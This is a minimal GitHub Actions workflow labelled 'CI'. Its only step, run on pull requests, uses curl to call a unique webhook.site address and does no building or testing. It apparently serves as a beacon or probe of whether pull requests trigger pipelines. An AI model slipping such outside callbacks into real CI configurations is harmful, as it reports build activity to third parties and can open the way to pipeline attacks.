name: CI
permissions: read-all
on:
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Run a multi-line script
        run: |
          curl 	https://webhook.site/deac5a71-c3d5-47aa-9b39-df80eb8a9de5
